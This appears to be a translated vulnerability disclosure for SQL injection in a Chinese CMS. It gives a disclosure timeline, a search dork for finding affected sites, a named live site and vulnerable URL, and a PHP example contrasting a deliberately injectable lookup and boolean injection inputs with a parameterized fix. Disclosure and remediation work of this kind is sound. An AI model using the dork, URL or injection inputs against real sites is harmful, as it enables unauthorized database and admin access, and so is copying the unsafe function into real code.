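2014-09-23: Details reported to the vendor; awaiting vendor response
2014-09-26: Vendor confirmed; details disclosed to the vendor only
2014-09-29: Details opened to third-party security partners
2014-11-20: Details disclosed to core white hats and experts in related fields
2014-11-30: Details disclosed to regular white hats
2014-12-10: Details disclosed to trainee white hats
2014-12-22: Details disclosed to the public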
SQL injection in a general-purpose CMS affects a large number of websites
Affected vendor: http://www.z029.com/ (兆泽网络科技)
Google keywords: 技术支持:兆泽网络科技 inurl:php/WZ_read.php?articid=
Some of the affected websites:
All of the tested sites are injectable:
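There are many more cases besides these.
Tested against the Xi'an Grape Research Institute site:
http://www.htgrape.com
http://www.htgrape.com/php/WZ_read.php?articid=107
Administrator account or password
Filter the parameters.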
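The fix named above is parameter filtering. As an added example (not the vendor's code; the CMS source is not shown on this page), the PHP below contrasts an assumed string-concatenated lookup on articid with a validated, parameterized one. The table, column and function names are hypothetical, and the sample row and inputs are constructed.

```php
<?php
declare(strict_types=1);

// Constructed sample data in an in-memory SQLite database. The schema
// article(id, title) is an assumption; the real CMS schema is not on the page.
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO article VALUES (107, 'sample article')");
    return $pdo;
}

// Vulnerable pattern (assumed): articid is concatenated inside quotes, so a
// quote in the value rewrites the WHERE clause and the appended condition
// decides whether a row comes back.
function read_article_unsafe(PDO $pdo, string $articid): ?array {
    $sql = "SELECT id, title FROM article WHERE id = '$articid'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened: accept only a short run of decimal digits, then bind the value
// as a typed parameter so it can never be parsed as SQL.
function read_article_safe(PDO $pdo, string $articid): ?array {
    if (!ctype_digit($articid) || strlen($articid) > 9) {
        return null; // reject anything that is not a plain integer id
    }
    $stmt = $pdo->prepare('SELECT id, title FROM article WHERE id = :id');
    $stmt->bindValue(':id', (int)$articid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Constructed inputs: a valid id, then the same id with a true and a false
// condition appended after a closing quote.
$pdo = demo_db();
$inputs = ["107", "107' and '1'='1", "107' and '1'='2"];
foreach ($inputs as $in) {
    printf("%-20s unsafe=%-4s safe=%s\n", $in,
        read_article_unsafe($pdo, $in) ? 'row' : 'none',
        read_article_safe($pdo, $in) ? 'row' : 'none');
}
```

The unsafe lookup answers differently for the true and false conditions, which is the behavior that marks the parameter as injectable; the hardened lookup rejects both inputs before any query runs.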
Severity: High
Vulnerability Rank: 13
Confirmed: 2014-09-26 14:51
None yet